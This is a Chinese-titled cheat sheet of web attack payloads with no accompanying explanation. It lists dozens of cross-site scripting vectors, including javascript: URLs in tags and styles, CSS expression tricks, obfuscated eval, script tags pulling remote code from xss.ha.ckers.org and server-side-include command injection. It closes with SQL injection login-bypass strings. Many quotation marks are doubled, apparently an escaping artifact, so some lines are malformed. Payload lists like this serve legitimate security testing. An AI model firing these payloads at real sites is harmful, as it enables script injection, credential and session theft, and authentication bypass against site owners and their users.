XSS测试语句大全

"livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(''XSS'');">
<IFRAME SRC=javascript:alert(''XSS'')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert(''XSS'')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert(''XSS'')">
<DIV STYLE="background-image: url(javascript:alert(''XSS''))">
<DIV STYLE="behaviour: url(''http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert(''XSS''));">
<STYLE>@im\port''\ja\vasc\ript:alert("XSS")'';</STYLE>
<IMG STYLE=''xss:expre\ssion(alert("XSS"))''>
<STYLE TYPE="text/javascript">alert(''XSS'');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(''XSS'')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(''XSS'')")}</STYLE>
<BASE HREF="javascript:alert(''XSS'');//">
getURL("javascript:alert(''XSS'')")
a="get";b="URL";c="javascript:";d="alert(''XSS'');";eval(a+b+c+d);
<XML SRC="javascript:alert(''XSS'');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(''XSS'');}</SCRIPT><"
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert(''XSS'')"
<!--#exec cmd="/bin/echo ''<SCRIPT SRC''"--><!--#exec cmd="/bin/echo ''=http://xss.ha.ckers.org/a.js></SCRIPT>''"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '''' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=''>''" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin''--
'' or 0=0 --
" or 0=0 --
or 0=0 --
'' or 0=0 #
" or 0=0 #
or 0=0 #
'' or ''x''=''x
" or "x"="x
'') or (''x''=''x
'' or 1=1--
" or 1=1--
or 1=1--
'' or a=a--
" or "a"="a
'') or (''a''=''a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi'' or 1=1 --
hi'' or ''a''=''a
hi'') or (''a''=''a
hi") or ("a"="a